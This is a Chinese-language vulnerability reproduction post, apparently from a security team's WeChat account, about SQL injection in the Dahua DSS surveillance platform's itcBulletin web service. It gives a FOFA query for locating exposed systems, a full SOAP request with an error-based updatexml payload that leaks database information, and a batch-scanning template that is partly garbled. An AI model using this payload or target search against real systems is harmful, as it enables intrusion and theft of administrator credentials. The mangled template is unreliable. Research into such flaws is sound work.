漏洞描述
大华 DSS存在SQL注入漏洞,攻击者 pota/services/itcBuletin 路由发送特殊构造的数据包,利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL注入漏词获取数据库中的信息例如,管理员后台密码、站点的用户人人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限
漏洞复现
第一步、使用下面fofa语句进行资产收集,确认测试目标
fofa语句
body="<meta http-equiv="refresh" content="1;url='/admin'"></span>" || body="dahuaDefined/headCommon.js" || title=="DSS"
第二步、漏洞首页
第三步、使用burp抓取当前页面数据包...将数据包发送到repeater中修改数据包进行测试
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 335
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,user(),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>
批量脚本
id: template-id
info:
name: Template Name
author: kali
severity: high
description: description
reference:
https://
tags: tags
requests:
raw:
|-
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: {{Hostname}}
gzip :
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 :
335 :
Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'> :
Body> :
deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'> :
<netMarkings>
and (1=1
</netMarkings>
deleteBulletin> :
Body> :
Envelope> :
and :
matchers:
type: word
part: body
words:
'soap'
原文始发于微信公众号(揽月安全团队):大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论